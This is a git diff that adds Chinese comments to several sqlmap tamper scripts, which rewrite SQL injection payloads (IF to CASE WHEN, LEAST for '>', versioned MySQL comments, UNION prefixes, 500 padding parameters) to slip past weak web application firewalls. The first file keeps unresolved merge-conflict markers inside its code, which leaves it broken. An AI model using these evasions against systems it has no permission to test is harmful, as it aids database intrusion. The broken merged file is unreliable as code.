 See the file 'doc/COPYING' for copying permission
 """
 
-from lib.core.compat import xrange
-from lib.core.enums import PRIORITY
-from lib.core.settings import REPLACEMENT_MARKER
+<<<<<<< HEAD
+from lib.core.compat import xrange  # 导入兼容库中的xrange函数，用于兼容Python 2和3的range函数
+from lib.core.enums import PRIORITY  # 从核心库导入优先级枚举
+from lib.core.settings import REPLACEMENT_MARKER  # 从核心设置导入替换标记
 
+# 设置优先级为最高
 __priority__ = PRIORITY.HIGHEST
+=======
+from lib.core.compat import xrange  # 用于兼容Python 2和3的range函数
+from lib.core.enums import PRIORITY  # 导入优先级枚举
+from lib.core.settings import REPLACEMENT_MARKER  # 导入替换标记
+
+__priority__ = PRIORITY.HIGHEST  # 设置优先级为最高
+>>>>>>> b2880b499320c050bf54d2910d89b1f5c9c1109f
 
 def dependencies():
+    """此函数用于定义此tamper函数的依赖项。当前实现为空，根据需要可以添加具体的依赖项"""
     pass
 
 def tamper(payload, **kwargs):
     """
-    Replaces instances like 'IF(A, B, C)' with 'CASE WHEN (A) THEN (B) ELSE (C) END' counterpart
-
-    Requirement:
-        * MySQL
-        * SQLite (possibly)
-        * SAP MaxDB (possibly)
-
-    Tested against:
-        * MySQL 5.0 and 5.5
-
+<<<<<<< HEAD
+    这个函数用于篡改（tamper）输入的payload，将'IF(A, B, C)'语句替换为其等效的'CASE WHEN (A) THEN (B) ELSE (C) END'形式。
+=======
+    替换IF条件表达式为CASE表达式
+>>>>>>> b2880b499320c050bf54d2910d89b1f5c9c1109f
+
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
+
+    要求：
+        * 适用于MySQL、SQLite（可能）和SAP MaxDB（可能）数据库。
+
+<<<<<<< HEAD
+    测试情况：
+        * MySQL 5.0 和 5.5
+
+    注意：
+        * 这个篡改方法对于绕过那些过滤IF()函数的非常弱的定制Web应用防火墙很有用。
+
+    示例：
+        >>> tamper('IF(1, 2, 3)')
+        'CASE WHEN (1) THEN (2) ELSE (3) END'
+=======
     Notes:
-        * Useful to bypass very weak and bespoke web application firewalls
-          that filter the IF() functions
+        * 适用于绕过非常弱且定制的web应用程序防火墙，该防火墙过滤了IF()函数
 
-    >>> tamper('IF(1, 2, 3)')
-    'CASE WHEN (1) THEN (2) ELSE (3) END'
-    >>> tamper('SELECT IF((1=1), (SELECT "foo"), NULL)')
-    'SELECT CASE WHEN (1=1) THEN (SELECT "foo") ELSE (NULL) END'
+    Examples:
+        >>> tamper('IF(1, 2, 3)')
+        'CASE WHEN (1) THEN (2) ELSE (3) END'
+
+>>>>>>> b2880b499320c050bf54d2910d89b1f5c9c1109f
+        >>> tamper('SELECT IF((1=1), (SELECT "foo"), NULL)')
+        'SELECT CASE WHEN (1=1) THEN (SELECT "foo") ELSE (NULL) END'
     """
 
-    if payload and payload.find("IF") > -1:
-        payload = payload.replace("()", REPLACEMENT_MARKER)
-        while payload.find("IF(") > -1:
-            index = payload.find("IF(")
-            depth = 1
-            commas, end = [], None
+<<<<<<< HEAD
+    if payload and payload.find("IF") > -1:  # 如果payload不为空且包含'IF'
+        payload = payload.replace("()", REPLACEMENT_MARKER)  # 替换空括号为替换标记
+        while payload.find("IF(") > -1:  # 遍历所有'IF'语句
+            index = payload.find("IF(")  # 找到'IF'的位置
+            depth = 1  # 初始化括号深度
+            commas, end = [], None  # 初始化逗号位置列表和结束位置
 
+            # 遍历payload以找到'IF'语句的结束位置
             for i in xrange(index + len("IF("), len(payload)):
                 if depth == 1 and payload[i] == ',':
-                    commas.append(i)
+                    commas.append(i)  # 记录逗号位置
 
                 elif depth == 1 and payload[i] == ')':
-                    end = i
+                    end = i  # 记录结束位置
                     break
 
                 elif payload[i] == '(':
-                    depth += 1
+                    depth += 1  # 增加括号深度
+
 
                 elif payload[i] == ')':
                     depth -= 1
-
+            # 如果找到两个逗号且有结束位置，则进行替换
             if len(commas) == 2 and end:
-                a = payload[index + len("IF("):commas[0]].strip("()")
-                b = payload[commas[0] + 1:commas[1]].lstrip().strip("()")
-                c = payload[commas[1] + 1:end].lstrip().strip("()")
-                newVal = "CASE WHEN (%s) THEN (%s) ELSE (%s) END" % (a, b, c)
-                payload = payload[:index] + newVal + payload[end + 1:]
+                a = payload[index + len("IF("):commas[0]].strip("()")  # 提取条件A
+                b = payload[commas[0] + 1:commas[1]].lstrip().strip("()")  # 提取结果B
+                c = payload[commas[1] + 1:end].lstrip().strip("()")  # 提取结果C
+                newVal = "CASE WHEN (%s) THEN (%s) ELSE (%s) END" % (a, b, c)  # 构造新的CASE语句
+                payload = payload[:index] + newVal + payload[end + 1:]  # 替换原IF语句
+            else:
+                break  # 如果不符合条件，则终止循环
+
+        payload = payload.replace(REPLACEMENT_MARKER, "()")  # 恢复替换标记为空括号
+=======
+    if payload and payload.find("IF") > -1:  # 检查payload是否包含IF
+        payload = payload.replace("()", REPLACEMENT_MARKER)  # 替换空的()为REPLACEMENT_MARKER
+        while payload.find("IF(") > -1:  # 检查payload中是否还包含IF(
+            index = payload.find("IF(")  # 找到IF(的位置
+            depth = 1  # 初始化深度计数器
+            commas, end = [], None  # 初始化逗号列表和结束位置
+
+            for i in xrange(index + len("IF("), len(payload)):  # 遍历IF(后的子串
+                if depth == 1 and payload[i] == ',':  # 如果深度为1且遇到逗号
+                    commas.append(i)  # 记录逗号位置
+                elif depth == 1 and payload[i] == ')':  # 如果深度为1且遇到右括号
+                    end = i  # 记录结束位置
+                    break  # 结束循环
+                elif payload[i] == '(':  # 如果遇到左括号
+                    depth += 1  # 增加深度
+                elif payload[i] == ')':  # 如果遇到右括号
+                    depth -= 1  # 减少深度
+
+            if len(commas) == 2 and end:  # 如果有2个逗号并且有结束位置
+                a = payload[index + len("IF("):commas[0]].strip("()")  # 提取第一个参数
+                b = payload[commas[0] + 1:commas[1]].lstrip().strip("()")  # 提取第二个参数
+                c = payload[commas[1] + 1:end].lstrip().strip("()")  # 提取第三个参数
+                newVal = "CASE WHEN (%s) THEN (%s) ELSE (%s) END" % (a, b, c)  # 构造CASE表达式
+                payload = payload[:index] + newVal + payload[end + 1:]  # 替换IF()为CASE
             else:
-                break
+                break  # 如果不符合条件，跳出循环
 
-        payload = payload.replace(REPLACEMENT_MARKER, "()")
+        payload = payload.replace(REPLACEMENT_MARKER, "()")  # 将REPLACEMENT_MARKER替换回()，防止影响其他部分
+>>>>>>> b2880b499320c050bf54d2910d89b1f5c9c1109f
 
-    return payload
+    return payload
\ No newline at end of file
diff --git a/src/sqlmap-master/tamper/ifnull2casewhenisnull.py b/src/sqlmap-master/tamper/ifnull2casewhenisnull.py
index f439d9d..dd8e6e1 100644
--- a/src/sqlmap-master/tamper/ifnull2casewhenisnull.py
+++ b/src/sqlmap-master/tamper/ifnull2casewhenisnull.py
@@ -5,9 +5,10 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
-from lib.core.compat import xrange
-from lib.core.enums import PRIORITY
+from lib.core.compat import xrange  # 导入兼容库中的xrange函数，用于兼容Python 2和3的range函数
+from lib.core.enums import PRIORITY  # 从核心库导入优先级枚举
 
+# 设置优先级为最高
 __priority__ = PRIORITY.HIGHEST
 
 def dependencies():
@@ -33,32 +34,35 @@ def tamper(payload, **kwargs):
     'CASE WHEN ISNULL(1) THEN (2) ELSE (1) END'
     """
 
-    if payload and payload.find("IFNULL") > -1:
-        while payload.find("IFNULL(") > -1:
-            index = payload.find("IFNULL(")
-            depth = 1
-            comma, end = None, None
+    if payload and payload.find("IFNULL") > -1:  # 如果payload不为空且包含'IFNULL'
+        while payload.find("IFNULL(") > -1:  # 遍历所有'IFNULL'语句
+            index = payload.find("IFNULL(")  # 找到'IFNULL'的位置
+            depth = 1 # 初始化括号深度
+            comma, end = None, None  # 初始化逗号位置和结束位置
 
+            # 遍历payload以找到'IFNULL'语句的结束位置
             for i in xrange(index + len("IFNULL("), len(payload)):
                 if depth == 1 and payload[i] == ',':
-                    comma = i
+                    comma = i  # 记录逗号位置
 
                 elif depth == 1 and payload[i] == ')':
-                    end = i
+                    end = i  # 记录结束位置
                     break
 
                 elif payload[i] == '(':
-                    depth += 1
+                    depth += 1  # 增加括号深度
+
 
                 elif payload[i] == ')':
-                    depth -= 1
+                    depth -= 1  # 减少括号深度
 
+            # 如果找到逗号和结束位置，则进行替换
             if comma and end:
-                _ = payload[index + len("IFNULL("):comma]
-                __ = payload[comma + 1:end].lstrip()
-                newVal = "CASE WHEN ISNULL(%s) THEN (%s) ELSE (%s) END" % (_, __, _)
-                payload = payload[:index] + newVal + payload[end + 1:]
+                _ = payload[index + len("IFNULL("):comma]  # 提取参数A
+                __ = payload[comma + 1:end].lstrip() # 提取参数B
+                newVal = "CASE WHEN ISNULL(%s) THEN (%s) ELSE (%s) END" % (_, __, _)  # 构造新的CASE语句
+                payload = payload[:index] + newVal + payload[end + 1:]  # 替换原IFNULL语句
             else:
-                break
+                break  # 如果不符合条件，则终止循环
 
     return payload
diff --git a/src/sqlmap-master/tamper/ifnull2ifisnull.py b/src/sqlmap-master/tamper/ifnull2ifisnull.py
index d182b68..4f1b6ea 100644
--- a/src/sqlmap-master/tamper/ifnull2ifisnull.py
+++ b/src/sqlmap-master/tamper/ifnull2ifisnull.py
@@ -5,9 +5,9 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
-from lib.core.compat import xrange
-from lib.core.enums import PRIORITY
-
+from lib.core.compat import xrange  # 导入兼容库中的xrange函数，用于兼容Python 2和3的range函数
+from lib.core.enums import PRIORITY  # 从核心库导入优先级枚举
+# 设置优先级为最高
 __priority__ = PRIORITY.HIGHEST
 
 def dependencies():
@@ -15,49 +15,53 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart
+    这个函数用于篡改（tamper）输入的payload，将'IFNULL(A, B)'语句替换为其等效的'IF(ISNULL(A), B, A)'形式。
+
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
 
-    Requirement:
-        * MySQL
-        * SQLite (possibly)
-        * SAP MaxDB (possibly)
+    要求：
+        * 适用于MySQL、SQLite（可能）和SAP MaxDB（可能）数据库。
 
-    Tested against:
-        * MySQL 5.0 and 5.5
+    测试情况：
+        * MySQL 5.0 和 5.5
 
-    Notes:
-        * Useful to bypass very weak and bespoke web application firewalls
-          that filter the IFNULL() function
+    注意：
+        * 这个篡改方法对于绕过那些过滤IFNULL()函数的非常弱的定制Web应用防火墙很有用。
 
-    >>> tamper('IFNULL(1, 2)')
-    'IF(ISNULL(1),2,1)'
+    示例：
+        >>> tamper('IFNULL(1, 2)')
+        'IF(ISNULL(1),2,1)'
     """
 
-    if payload and payload.find("IFNULL") > -1:
-        while payload.find("IFNULL(") > -1:
-            index = payload.find("IFNULL(")
-            depth = 1
-            comma, end = None, None
+    if payload and payload.find("IFNULL") > -1:  # 如果payload不为空且包含'IFNULL'
+        while payload.find("IFNULL(") > -1:  # 遍历所有'IFNULL'语句
+            index = payload.find("IFNULL(") # 找到'IFNULL'的位置
+            depth = 1 # 初始化括号深度
+            comma, end = None, None  # 初始化逗号位置和结束位置
 
+            # 遍历payload以找到'IFNULL'语句的结束位置
             for i in xrange(index + len("IFNULL("), len(payload)):
                 if depth == 1 and payload[i] == ',':
-                    comma = i
+                    comma = i  # 记录逗号位置
 
                 elif depth == 1 and payload[i] == ')':
-                    end = i
+                    end = i  # 记录结束位置
                     break
 
                 elif payload[i] == '(':
-                    depth += 1
+                    depth += 1  # 增加括号深度
 
                 elif payload[i] == ')':
-                    depth -= 1
+                    depth -= 1  # 减少括号深度
 
+            # 如果找到逗号和结束位置，则进行替换
             if comma and end:
-                _ = payload[index + len("IFNULL("):comma]
-                __ = payload[comma + 1:end].lstrip()
-                newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _)
-                payload = payload[:index] + newVal + payload[end + 1:]
+                _ = payload[index + len("IFNULL("):comma]  # 提取参数A
+                __ = payload[comma + 1:end].lstrip() # 提取参数B
+                newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _)  # 构造新的IF语句
+                payload = payload[:index] + newVal + payload[end + 1:]  # 替换原IFNULL语句
             else:
                 break
 
diff --git a/src/sqlmap-master/tamper/informationschemacomment.py b/src/sqlmap-master/tamper/informationschemacomment.py
index 9ec46b5..585b0c2 100644
--- a/src/sqlmap-master/tamper/informationschemacomment.py
+++ b/src/sqlmap-master/tamper/informationschemacomment.py
@@ -9,6 +9,7 @@ import re
 
 from lib.core.enums import PRIORITY
 
+# 设置优先级为普通
 __priority__ = PRIORITY.NORMAL
 
 def tamper(payload, **kwargs):
@@ -19,9 +20,10 @@ def tamper(payload, **kwargs):
     'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'
     """
 
-    retVal = payload
+    retVal = payload  # 初始化返回值为输入的payload
 
-    if payload:
+    if payload:  # 如果payload不为空
+        # 使用正则表达式查找"information_schema"并添加内联注释
         retVal = re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload)
 
     return retVal
diff --git a/src/sqlmap-master/tamper/least.py b/src/sqlmap-master/tamper/least.py
index 9c948b4..bbb37e5 100644
--- a/src/sqlmap-master/tamper/least.py
+++ b/src/sqlmap-master/tamper/least.py
@@ -5,7 +5,7 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
-import re
+import re  # 导入正则表达式模块，用于匹配和替换字符串中的模式
 
 from lib.core.enums import PRIORITY
 
@@ -16,30 +16,35 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    Replaces greater than operator ('>') with 'LEAST' counterpart
+    这个函数用于篡改（tamper）输入的payload，将大于操作符（'>')替换为'LEAST'函数的等效形式。
 
-    Tested against:
-        * MySQL 4, 5.0 and 5.5
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
+
+    测试情况：
+        * MySQL 4, 5.0 和 5.5
         * Oracle 10g
         * PostgreSQL 8.3, 8.4, 9.0
 
-    Notes:
-        * Useful to bypass weak and bespoke web application firewalls that
-          filter the greater than character
-        * The LEAST clause is a widespread SQL command. Hence, this
-          tamper script should work against majority of databases
+    注意：
+        * 这个篡改方法对于绕过那些过滤大于字符（'>')的弱Web应用防火墙很有用。
+        * LEAST函数是一个广泛使用的SQL命令。因此，这个tamper脚本应该适用于大多数数据库。
 
-    >>> tamper('1 AND A > B')
-    '1 AND LEAST(A,B+1)=B+1'
+    示例：
+        >>> tamper('1 AND A > B')
+        '1 AND LEAST(A,B+1)=B+1'
     """
 
     retVal = payload
 
-    if payload:
+    if payload:  # 如果payload不为空
+        # 使用正则表达式查找'A > B'形式的语句
         match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)
 
-        if match:
+        if match:  # 如果找到匹配项
+            # 构造LEAST函数形式的语句，并替换原语句
             _ = "%sLEAST(%s,%s+1)=%s+1" % (match.group(1), match.group(3), match.group(4), match.group(4))
-            retVal = retVal.replace(match.group(0), _)
+            retVal = retVal.replace(match.group(0), _)  # 替换原语句为LEAST函数形式
 
     return retVal
diff --git a/src/sqlmap-master/tamper/lowercase.py b/src/sqlmap-master/tamper/lowercase.py
index 230f7ef..adfab06 100644
--- a/src/sqlmap-master/tamper/lowercase.py
+++ b/src/sqlmap-master/tamper/lowercase.py
@@ -5,11 +5,12 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
-import re
+import re  # 导入正则表达式模块，用于匹配字符串中的模式
 
-from lib.core.data import kb
-from lib.core.enums import PRIORITY
+from lib.core.data import kb  # 从核心库导入知识库，包含SQL关键字等信息
+from lib.core.enums import PRIORITY  # 从核心库导入优先级枚举
 
+# 设置优先级为普通
 __priority__ = PRIORITY.NORMAL
 
 def dependencies():
@@ -17,28 +18,34 @@ def dependencies():
 
 def tamper(payload, **kwargs):
     """
-    Replaces each keyword character with lower case value (e.g. SELECT -> select)
+    这个函数用于篡改（tamper）输入的payload，将其中的关键字字符转换为小写形式（例如，'SELECT' -> 'select'）。
 
-    Tested against:
+    参数：
+        payload：要篡改的原始payload。
+        **kwargs：其他可选参数（在本函数中未使用）。
+
+    测试情况：
         * Microsoft SQL Server 2005
-        * MySQL 4, 5.0 and 5.5
+        * MySQL 4, 5.0 和 5.5
         * Oracle 10g
         * PostgreSQL 8.3, 8.4, 9.0
 
-    Notes:
-        * Useful to bypass very weak and bespoke web application firewalls
-          that has poorly written permissive regular expressions
+    注意：
+        * 这个篡改方法对于绕过那些具有写得不好的允许正则表达式的非常弱的定制Web应用防火墙很有用。
 
-    >>> tamper('INSERT')
-    'insert'
+    示例：
+        >>> tamper('INSERT')
+        'insert'
     """
 
-    retVal = payload
+    retVal = payload  # 初始化返回值为输入的payload
 
-    if payload:
-        for match in re.finditer(r"\b[A-Za-z_]+\b", retVal):
-            word = match.group()
 
+    if payload:  # 如果payload不为空
+        # 遍历payload中所有匹配单词边界的字母或下划线模式的字符串
+        for match in re.finditer(r"\b[A-Za-z_]+\b", retVal):
+            word = match.group() # 获取匹配的单词
+            # 如果匹配的单词是SQL关键字，则将其转换为小写
             if word.upper() in kb.keywords:
                 retVal = retVal.replace(word, word.lower())
 
diff --git a/src/sqlmap-master/tamper/luanginx.py b/src/sqlmap-master/tamper/luanginx.py
index f4bf825..ee3fe76 100644
--- a/src/sqlmap-master/tamper/luanginx.py
+++ b/src/sqlmap-master/tamper/luanginx.py
@@ -5,13 +5,13 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
-import random
-import string
+import random  # 导入随机数模块，用于生成随机字符串
+import string  # 导入字符串模块，用于访问字符串常量
 
-from lib.core.compat import xrange
-from lib.core.enums import HINT
-from lib.core.enums import PRIORITY
-from lib.core.settings import DEFAULT_GET_POST_DELIMITER
+from lib.core.compat import xrange  # 导入兼容库中的xrange函数，用于兼容Python 2和3的range函数
+from lib.core.enums import HINT  # 从核心库导入枚举类型
+from lib.core.enums import PRIORITY  # 从核心库导入优先级枚举
+from lib.core.settings import DEFAULT_GET_POST_DELIMITER  # 从核心设置导入默认的GET/POST参数分隔符
 
 __priority__ = PRIORITY.NORMAL
 
@@ -29,8 +29,10 @@ def tamper(payload, **kwargs):
     '34=&Xe=&90=&Ni=&rW=&lc=&te=&T4=&zO=&NY=&B4=&hM=&X2=&pU=&D8=&hm=&p0=&7y=&18=&RK=&Xi=&5M=&vM=&hO=&bg=&5c=&b8=&dE=&7I=&5I=&90=&R2=&BK=&bY=&p4=&lu=&po=&Vq=&bY=&3c=&ps=&Xu=&lK=&3Q=&7s=&pq=&1E=&rM=&FG=&vG=&Xy=&tQ=&lm=&rO=&pO=&rO=&1M=&vy=&La=&xW=&f8=&du=&94=&vE=&9q=&bE=&lQ=&JS=&NQ=&fE=&RO=&FI=&zm=&5A=&lE=&DK=&x8=&RQ=&Xw=&LY=&5S=&zi=&Js=&la=&3I=&r8=&re=&Xe=&5A=&3w=&vs=&zQ=&1Q=&HW=&Bw=&Xk=&LU=&Lk=&1E=&Nw=&pm=&ns=&zO=&xq=&7k=&v4=&F6=&Pi=&vo=&zY=&vk=&3w=&tU=&nW=&TG=&NM=&9U=&p4=&9A=&T8=&Xu=&xa=&Jk=&nq=&La=&lo=&zW=&xS=&v0=&Z4=&vi=&Pu=&jK=&DE=&72=&fU=&DW=&1g=&RU=&Hi=&li=&R8=&dC=&nI=&9A=&tq=&1w=&7u=&rg=&pa=&7c=&zk=&rO=&xy=&ZA=&1K=&ha=&tE=&RC=&3m=&r2=&Vc=&B6=&9A=&Pk=&Pi=&zy=&lI=&pu=&re=&vS=&zk=&RE=&xS=&Fs=&x8=&Fe=&rk=&Fi=&Tm=&fA=&Zu=&DS=&No=&lm=&lu=&li=&jC=&Do=&Tw=&xo=&zQ=&nO=&ng=&nC=&PS=&fU=&Lc=&Za=&Ta=&1y=&lw=&pA=&ZW=&nw=&pM=&pa=&Rk=&lE=&5c=&T4=&Vs=&7W=&Jm=&xG=&nC=&Js=&xM=&Rg=&zC=&Dq=&VA=&Vy=&9o=&7o=&Fk=&Ta=&Fq=&9y=&vq=&rW=&X4=&1W=&hI=&nA=&hs=&He=&No=&vy=&9C=&ZU=&t6=&1U=&1Q=&Do=&bk=&7G=&nA=&VE=&F0=&BO=&l2=&BO=&7o=&zq=&B4=&fA=&lI=&Xy=&Ji=&lk=&7M=&JG=&Be=&ts=&36=&tW=&fG=&T4=&vM=&hG=&tO=&VO=&9m=&Rm=&LA=&5K=&FY=&HW=&7Q=&t0=&3I=&Du=&Xc=&BS=&N0=&x4=&fq=&jI=&Ze=&TQ=&5i=&T2=&FQ=&VI=&Te=&Hq=&fw=&LI=&Xq=&LC=&B0=&h6=&TY=&HG=&Hw=&dK=&ru=&3k=&JQ=&5g=&9s=&HQ=&vY=&1S=&ta=&bq=&1u=&9i=&DM=&DA=&TG=&vQ=&Nu=&RK=&da=&56=&nm=&vE=&Fg=&jY=&t0=&DG=&9o=&PE=&da=&D4=&VE=&po=&nm=&lW=&X0=&BY=&NK=&pY=&5Q=&jw=&r0=&FM=&lU=&da=&ls=&Lg=&D8=&B8=&FW=&3M=&zy=&ho=&Dc=&HW=&7E=&bM=&Re=&jk=&Xe=&JC=&vs=&Ny=&D4=&fA=&DM=&1o=&9w=&3C=&Rw=&Vc=&Ro=&PK=&rw=&Re=&54=&xK=&VK=&1O=&1U=&vg=&Ls=&xq=&NA=&zU=&di=&BS=&pK=&bW=&Vq=&BC=&l6=&34=&PE=&JG=&TA=&NU=&hi=&T0=&Rs=&fw=&FQ=&NQ=&Dq=&Dm=&1w=&PC=&j2=&r6=&re=&t2=&Ry=&h2=&9m=&nw=&X4=&vI=&rY=&1K=&7m=&7g=&J8=&Pm=&RO=&7A=&fO=&1w=&1g=&7U=&7Y=&hQ=&FC=&vu=&Lw=&5I=&t0=&Na=&vk=&Te=&5S=&ZM=&Xs=&Vg=&tE=&J2=&Ts=&Dm=&Ry=&FC=&7i=&h8=&3y=&zk=&5G=&NC=&Pq=&ds=&zK=&d8=&zU=&1a=&d8=&Js=&nk=&TQ=&tC=&n8=&Hc=&Ru=&H0=&Bo=&XE=&Jm=&xK=&r2=&Fu=&FO=&NO=&7g=&PC=&Bq=&3O=&FQ=&1o=&5G=&zS=&Ps=&j0=&b0=&RM=&DQ=&RQ=&zY=&nk=&1 AND 2>1'
     """
 
-    hints = kwargs.get("hints", {})
-    delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER)
+    hints = kwargs.get("hints", {}) # 从kwargs中获取hints字典，若不存在则初始化为空字典
+    delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER)  # 从kwargs中获取delimiter，若不存在则使用默认的GET/POST参数分隔符
+
+# 生成大量随机参数并添加到hints[HINT.PREPEND]中，用于绕过WAF
 
     hints[HINT.PREPEND] = delimiter.join("%s=" % "".join(random.sample(string.ascii_letters + string.digits, 2)) for _ in xrange(500))
 
diff --git a/src/sqlmap-master/tamper/misunion.py b/src/sqlmap-master/tamper/misunion.py
index 596880a..c852b82 100644
--- a/src/sqlmap-master/tamper/misunion.py
+++ b/src/sqlmap-master/tamper/misunion.py
@@ -8,12 +8,14 @@ See the file 'LICENSE' for copying permission
 import os
 import re
 
+# 从sqlmap的库中导入一些枚举和函数
 from lib.core.common import singleTimeWarnMessage
 from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 
 __priority__ = PRIORITY.HIGHEST
 
+# 定义dependencies函数，用于在运行tamper脚本时显示警告信息
 def dependencies():
     singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
 
@@ -32,5 +34,8 @@ def tamper(payload, **kwargs):
     >>> tamper('1" UNION ALL SELECT')
     '1"-.1UNION ALL SELECT'
     """
-
+    # 使用正则表达式替换payload中的UNION关键字，前面加上-.1
+    # 这样做是为了绕过某些WAF（Web Application Firewall）的检测
+    # 正则表达式(?i)\s+(UNION )匹配UNION关键字，并且忽略大小写
+    # \g<1>是反向引用，表示替换时保留匹配到的UNION关键字
     return re.sub(r"(?i)\s+(UNION )", r"-.1\g<1>", payload) if payload else payload
diff --git a/src/sqlmap-master/tamper/modsecurityversioned.py b/src/sqlmap-master/tamper/modsecurityversioned.py
index 19c1d08..66ab070 100644
--- a/src/sqlmap-master/tamper/modsecurityversioned.py
+++ b/src/sqlmap-master/tamper/modsecurityversioned.py
@@ -7,16 +7,22 @@ See the file 'LICENSE' for copying permission
 
 import os
 
+# 从sqlmap的库中导入随机数生成函数和单次警告消息函数
 from lib.core.common import randomInt
 from lib.core.common import singleTimeWarnMessage
+# 导入数据库管理系统枚举和优先级枚举
 from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 
+# 设置这个tamper脚本的优先级
 __priority__ = PRIORITY.HIGHER
 
+# 定义dependencies函数，用于在运行tamper脚本时显示警告信息
 def dependencies():
+    # 显示单次警告消息，告知用户这个tamper脚本只针对MySQL数据库
     singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
 
+# 定义tamper函数，这是脚本的主要功能函数，用于修改payload
 def tamper(payload, **kwargs):
     """
     Embraces complete query with (MySQL) versioned comment
@@ -38,14 +44,18 @@ def tamper(payload, **kwargs):
 
     retVal = payload
 
+    # 如果payload不为空
     if payload:
         postfix = ''
+        # 遍历可能的注释符号，找到payload中的第一个注释符号
         for comment in ('#', '--', '/*'):
             if comment in payload:
                 postfix = payload[payload.find(comment):]
                 payload = payload[:payload.find(comment)]
                 break
+            # 如果payload中包含空格，说明可以插入versioned comment
         if ' ' in payload:
+            # 构造新的payload，插入versioned comment
             retVal = "%s /*!30%s%s*/%s" % (payload[:payload.find(' ')], randomInt(3), payload[payload.find(' ') + 1:], postfix)
 
     return retVal
diff --git a/src/sqlmap-master/tamper/modsecurityzeroversioned.py b/src/sqlmap-master/tamper/modsecurityzeroversioned.py
index c646d1a..f83fb10 100644
--- a/src/sqlmap-master/tamper/modsecurityzeroversioned.py
+++ b/src/sqlmap-master/tamper/modsecurityzeroversioned.py
@@ -7,15 +7,21 @@ See the file 'LICENSE' for copying permission
 
 import os
 
+# 从sqlmap的库中导入单次警告消息函数
 from lib.core.common import singleTimeWarnMessage
+# 导入数据库管理系统枚举和优先级枚举
 from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 
+# 设置这个tamper脚本的优先级
 __priority__ = PRIORITY.HIGHER
 
+# 定义dependencies函数，用于在运行tamper脚本时显示警告信息
 def dependencies():
+    # 显示单次警告消息，告知用户这个tamper脚本只针对MySQL数据库
     singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
 
+# 定义tamper函数，这是脚本的主要功能函数，用于修改payload
 def tamper(payload, **kwargs):
     """
     Embraces complete query with (MySQL) zero-versioned comment
@@ -37,12 +43,15 @@ def tamper(payload, **kwargs):
 
     if payload:
         postfix = ''
+        # 遍历可能的注释符号，找到payload中的第一个注释符号
         for comment in ('#', '--', '/*'):
             if comment in payload:
                 postfix = payload[payload.find(comment):]
                 payload = payload[:payload.find(comment)]
                 break
+            # 如果payload中包含空格，说明可以插入zero-versioned comment
         if ' ' in payload:
+            # 构造新的payload，插入zero-versioned comment
             retVal = "%s /*!00000%s*/%s" % (payload[:payload.find(' ')], payload[payload.find(' ') + 1:], postfix)
 
     return retVal
diff --git a/src/sqlmap-master/tamper/multiplespaces.py b/src/sqlmap-master/tamper/multiplespaces.py
index 8f2ae17..6e26a9b 100644
--- a/src/sqlmap-master/tamper/multiplespaces.py
+++ b/src/sqlmap-master/tamper/multiplespaces.py
@@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission
 import random
 import re
 
+# 从sqlmap的库中导入知识库和数据类型
 from lib.core.data import kb
 from lib.core.datatype import OrderedSet
 from lib.core.enums import PRIORITY
@@ -35,16 +36,22 @@ def tamper(payload, **kwargs):
     retVal = payload
 
     if payload:
+        # 使用OrderedSet存储找到的SQL关键字，确保关键字的唯一性
         words = OrderedSet()
 
+        # 使用正则表达式找到payload中的所有单词（SQL关键字）
         for match in re.finditer(r"\b[A-Za-z_]+\b", payload):
             word = match.group()
-
+            # 如果单词是SQL关键字，则添加到OrderedSet中
             if word.upper() in kb.keywords:
                 words.add(word)
-
+        # 对于OrderedSet中的每个SQL关键字
         for word in words:
+            # 在关键字前后添加1到4个随机数量的空格
+            # (?<=\W)确保我们在非单词字符后替换
+            # (?=[^A-Za-z_(]|\Z)确保我们在非单词字符前替换或字符串末尾
             retVal = re.sub(r"(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * random.randint(1, 4), word, ' ' * random.randint(1, 4)), retVal)
+            # 对于后面紧跟着括号的关键字，只添加左边的空格
             retVal = re.sub(r"(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randint(1, 4), word), retVal)
 
     return retVal
diff --git a/src/sqlmap-master/tamper/ord2ascii.py b/src/sqlmap-master/tamper/ord2ascii.py
index f5cf8a2..2277fc1 100644
--- a/src/sqlmap-master/tamper/ord2ascii.py
+++ b/src/sqlmap-master/tamper/ord2ascii.py
@@ -28,6 +28,8 @@ def tamper(payload, **kwargs):
     retVal = payload
 
     if payload:
+        # 使用正则表达式将所有的ORD()函数调用替换为ASCII()函数调用
